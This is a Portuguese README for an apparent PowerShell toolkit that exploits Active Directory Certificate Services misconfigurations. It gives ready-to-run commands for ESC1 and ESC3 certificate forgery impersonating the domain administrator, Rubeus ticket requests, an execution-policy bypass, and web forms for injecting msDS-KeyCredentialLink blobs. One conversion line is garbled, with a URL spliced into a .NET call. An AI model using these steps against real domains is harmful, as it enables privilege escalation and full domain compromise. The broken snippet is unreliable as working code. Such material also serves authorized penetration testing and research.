
# Conteúdo relacionado à exploração de AD CS vai aqui
O Certi-Bhai é uma coleção abrangente de ferramentas de exploração em PowerShell para atacar vulnerabilidades dos Serviços de Certificados do Active Directory (AD CS). Este kit implementa vários Cenários de Escalonamento (ESCs) que demonstram configurações incorretas críticas de segurança em ambientes ADCS.
Os Serviços de Certificados do Active Directory (AD CS) são frequentemente configurados incorretamente, criando múltiplos vetores de ataque. O Certi-Bhai fornece scripts e utilitários práticos de exploração para testes de segurança e pesquisa de vulnerabilidades comuns do ADCS.
Use com responsabilidade e apenas em ambientes de teste autorizados.
# Módulo Active Directory (opcional, para funcionalidade aprimorada)
Import-Module ActiveDirectory
Vulnerabilidade: Os modelos de certificado permitem a inscrição com valores arbitrários de SubjectAltName (SAN).
O que faz: Cria um certificado assinado por um modelo excessivamente permissivo, permitindo que você se passe por qualquer usuário ou computador no domínio.
Utilização:
# Navegue até o diretório ESC1
cd ESC1
# Execute o script de exploração
.
\esc1.ps1 -subjectName "CN=administrator,CN=Users,DC=indishell,DC=lab" `
-templateName "vuln" `
-altName "administrator" `
-pfxPass "password123"
Parâmetros:
-subjectName: Nome distinto completo (DN) do usuário alvo-templateName: Nome do modelo de certificado vulnerável-altName: Nome alternativo a solicitar (nome de usuário/computador)-pfxPass: Senha para exportação PFXSaída: Certificado PFX codificado em Base64 para uso com ferramentas como Rubeus
Tutorial em Vídeo: https://www.youtube.com/watch?v=l0gMw_mO4dw
Vulnerabilidade: Os Agentes de Solicitação de Certificado podem solicitar certificados em nome de qualquer usuário.
O que faz: Inscreve um certificado como Agente de Solicitação de Certificado e, em seguida, solicita certificados para entidades arbitrárias.
Utilização:
# Navegue até o diretório ESC3
cd ESC3
# Execute o script de exploração
.
\esc3_working.ps1 -templateName "CEOTemplate" `
-target_user "administrator" `
-domain "INDISHELL" `
-pfxPass "password123"
Parâmetros:
-templateName: Modelo de agente de solicitação vulnerável-target_user: Entidade para a qual solicitar o certificado-domain: Nome do domínio-pfxPass: Senha do PFXSaída: Certificado de administrador (PFX) com codificação base64
Tutorial em Vídeo: https://www.youtube.com/watch?v=fGjrM-JKnoM
Vulnerabilidade: Injeção de Política de Aplicação.
cd CSR_Generate
# Gere uma solicitação de assinatura de certificado
.
\csr_short.ps1 -subjectName "CN=admin,CN=Users,DC=domain,DC=local" `
-altName "admin"
# Submeta CSR à AC
.
\csr_submit.ps1 -csr $csr `
-templateName "User" `
-caServer "ca-server.domain.local"
A interface web cert.aspx fornece um formulário fácil de usar para solicitar um certificado ao endpoint RPC do AD CS:
http://your-iis-server/cert.aspx
Modifique atributos LDAP através da interface web. Este script é basicamente usado para executar a injeção de blob no atributo msDS-KeyCredentialLink:
http://your-iis-server/ldap_update.aspx
Funcionalidades:
.
\ESC1/esc1.ps1 -subjectName "CN=admin,CN=Users,DC=indishell,DC=lab" `
-templateName "User" `
-altName "administrator" `
-pfxPass "P@ssw0rd!"
# Converta PFX para formato utilizável no Rubeus
$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2("cert.pfx", "password")
[Convert]:https://raw.githubusercontent.com/incredibleindishell/certi-bhai/main/:ToBase64String($cert.RawData)
Rubeus.exe asktgt /user:administrator /certificate:$base64cert /nowrap
P: A execução do script está bloqueada
# Execute o PowerShell como Administrador
Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process
P: Modelo de certificado não encontrado
P: A conexão LDAP falha
Encontrou um problema ou tem melhorias? Por favor, reporte com responsabilidade.